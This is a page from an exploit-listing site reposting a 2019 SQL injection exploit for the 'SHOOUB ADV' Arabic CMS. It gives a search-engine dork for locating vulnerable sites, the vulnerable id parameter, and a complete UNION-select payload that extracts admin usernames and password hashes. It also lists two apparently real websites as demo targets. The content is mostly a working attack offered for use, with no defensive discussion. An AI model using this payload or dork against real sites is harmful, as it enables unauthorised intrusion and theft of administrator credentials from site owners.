Advertisement






SHOOUB ADV ARABIC CMS SQL injection

CVE Category Price Severity
CWE-89 $500 High
Author Risk Exploitation Type Date
ShoOoB High Remote 2019-05-13
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050138

Below is a copy:

SHOOUB ADV ARABIC CMS SQL injection
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: SHOOUB ADV ARABIC CMS SQL injection
# Date: 2019-05-11
# Dork : intext:"SHOOUB ADV" inurl:*id=
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.adv.shooub.com/
# Version: All Version
# Tested on: win,linux
=================================================================================
                                             [SQL injection]     

[+] Method ( Sql injection ) Nullix Security Team of IRan
[+]  parameter  : ID == php?ID=
=================================================================================
Mode Hash : MD5 
=================
[#] Testing Method:

[+] - UNION query

=================================================================================
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
<-> #Be sure to install the NoRedirect add-ons and add the index.php to it

Exploit ==> 
Service.php?id=-1' Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,Username,0x3c62723e,0x70617373,0x203d3d3e20,Password,0x3c62723e,0x3c62723e))))x),(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,Username,0x3c62723e,0x70617373,0x203d3d3e20,Password,0x3c62723e,0x3c62723e))))x),4,[Number of columns]-- -

<-> #At all sites, Column 2 or 3 is 100% vulnerable
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] http://blue-fields.net/Service.php?id=[SQL]
[+] http://sadv.sa/E/Service.php?id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @NullixTM
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum